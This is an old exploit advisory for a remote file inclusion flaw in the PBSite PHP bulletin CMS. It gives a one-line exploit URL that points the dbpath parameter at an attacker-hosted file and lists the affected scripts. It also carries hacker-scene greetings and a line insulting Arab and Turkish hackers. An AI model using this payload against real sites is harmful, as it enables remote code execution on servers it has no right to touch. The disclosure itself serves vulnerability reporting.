Title: PBSite <= B1 C45.1 Remote File Inclusion Vulnerability

```````````````````````````````````````````````````````````````````

The bug is Discovered by Minus-Power 
Mail: minus-power [at] myway [dot] com

Date: 19.Aug 2006
                   -=[ Republic of IRAN ]=-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz : R00T[ATI] - Stansar & members of RS
Damn to : All Arab & Turkish hackers
--------------------------------------------------------------------
Details:

+ Script name: PBSite - PHP Bulletin Site | CMS
+ Script url: http://sourceforge.net/projects/pbsite/

# Exp:
www.[website].com/[ Path to PBsite ]/index.php?dbpath=[ ATTACKER ]


Vulnerable Scripts:
index.php
admin.php
admin.php
admin2.php
board.php
confirm.php
delpm.php
delpost.php
editpost.php
forum.php
help.php
login.php
logout.php
memberslist.php
news.php
nreply.php
ntopic.php
pm.php
pmpshow.php
post.php
profile.php
register.php
search.php
sendpm.php
setcookie.php
ucp.php
useronline.php
/templates/pb/css/formstyles.php